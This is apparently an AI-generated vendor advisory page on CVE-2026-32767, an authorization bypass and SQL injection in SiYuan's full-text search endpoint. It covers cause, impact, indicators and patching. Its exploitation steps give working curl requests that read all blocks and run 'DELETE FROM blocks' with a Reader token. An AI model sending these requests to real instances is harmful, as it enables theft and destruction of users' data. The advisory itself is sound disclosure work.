CVE-2026-32767: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-32767 is an authorization bypass and SQL injection vulnerability in SiYuan, a personal knowledge management system developed by b3log. The flaw exists in the /api/search/fullTextSearchBlock endpoint, which — when the method parameter is set to 2 — passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user, including those with only the Reader role, to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.). Versions 3.6.0 and below are affected; the issue was disclosed on March 14, 2026, and patched in version 3.6.1. It carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory, SiYuan Advisory).

Technical details

The root cause is a combination of CWE-89 (SQL Injection) and CWE-863 (Incorrect Authorization). In kernel/api/router.go, the /api/search/fullTextSearchBlock endpoint is registered with only the model.CheckAuth middleware, which permits any authenticated role (Administrator, Editor, or Reader), unlike the dedicated /api/query/sql endpoint which correctly chains CheckAdminRole and CheckReadonly middleware. When method=2 is supplied, the raw query parameter flows through model.FullTextSearchBlock() → searchBySQL() → sql.SelectBlocksRawStmt() → Go's database/sql db.Query(), which executes any SQL statement without restriction. Notably, if the SQL parser fails to parse the statement, the code falls through to selectBlocksRawStmt() which executes the raw statement directly, meaning even malformed SQL may trigger execution. The fix, applied in commit d5e2d0b, adds an explicit role check in kernel/api/search.go that rejects method=2 requests from non-administrator users (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows any authenticated user — even one with the lowest-privilege Reader role — to fully compromise the SiYuan SQLite database. Confidentiality is breached as all blocks, assets, references, and configuration data can be read; integrity is violated as data can be modified or deleted; and availability is threatened as tables can be dropped, rendering the application unusable. The impact is most severe in multi-user deployments such as Docker instances with network-accessible publish services, where Reader-role accounts may be broadly distributed (SiYuan Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of explicit curl commands with JSON payloads that trigger arbitrary SQL execution (SELECT, DELETE, DROP TABLE) against a live SiYuan instance (SiYuan Advisory). The only prerequisite is a valid authentication token for any user role, including Reader. There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.047% (0.000470), indicating a currently low probability of active exploitation (GitHub Advisory). This CVE is not listed in the CISA KEV catalog.

Exploitation steps

  1. Reconnaissance: Identify network-accessible SiYuan instances (default port 6806) running version 3.6.0 or earlier, particularly Docker deployments or instances with published access enabled.
  2. Obtain credentials: Acquire a valid authentication token for any user account, including the lowest-privilege Reader role. This may be obtained via legitimate account registration or credential theft.
  3. Craft the malicious request: Construct a POST request to /api/search/fullTextSearchBlock with method set to 2 and the desired SQL statement in the query field.
  4. Exfiltrate data (confidentiality): Send the following to read all blocks:
curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "SELECT * FROM blocks LIMIT 100"}'
  1. Destroy data (integrity/availability): Send destructive SQL to delete or drop tables:
curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \
  -H "Content-Type: application/json" \
  -H "Authorization: Token <reader_token>" \
  -d '{"method": 2, "query": "DELETE FROM blocks"}'
  1. Confirm bypass: Verify the attack succeeds where the protected endpoint would return HTTP 403 for the same user role against /api/query/sql (SiYuan Advisory).

Indicators of compromise

  • Network: Unusual POST requests to /api/search/fullTextSearchBlock on port 6806 containing JSON bodies with "method": 2 and SQL keywords (SELECT, DELETE, DROP, UPDATE) in the query field; unexpected outbound connections from the SiYuan host following such requests.
  • Logs: SiYuan application logs showing repeated or anomalous requests to /api/search/fullTextSearchBlock from Reader-role accounts; HTTP 200 responses to requests containing destructive SQL statements (pre-patch).
  • File System: Unexpected changes to the SiYuan SQLite database files (e.g., missing tables, deleted records, altered timestamps on .db files in the SiYuan data directory).
  • Application Behavior: SiYuan application errors or crashes due to missing or corrupted database tables; missing blocks or notebooks that were not intentionally deleted by administrators (SiYuan Advisory).

Mitigation and workarounds

The primary remediation is to upgrade SiYuan to version 3.6.1 or later, which adds an explicit administrator role check for method=2 requests in the search endpoint (SiYuan v3.6.1 Release, Patch Commit). As a temporary workaround prior to patching, restrict network access to the /api/search/fullTextSearchBlock endpoint via firewall rules or reverse proxy ACLs, and limit SiYuan exposure to trusted networks only. Administrators should also audit the SQLite database for unauthorized modifications (deleted records, dropped tables) that may have occurred before patching (GitHub Advisory).

Community reactions

The vulnerability was reported by researcher iconnnjka and disclosed by the SiYuan maintainer (88250) on March 14, 2026, alongside fixes for nine other security issues tracked in GitHub issue #17209. The fix was released promptly in version 3.6.1 on March 17, 2026. No significant broader media coverage or notable public researcher commentary beyond the advisory itself has been identified (SiYuan Advisory, GitHub Issue).

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103493HIGH8.1
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103494MEDIUM6.6
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026
CVE-2026-103495MEDIUM4.3
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management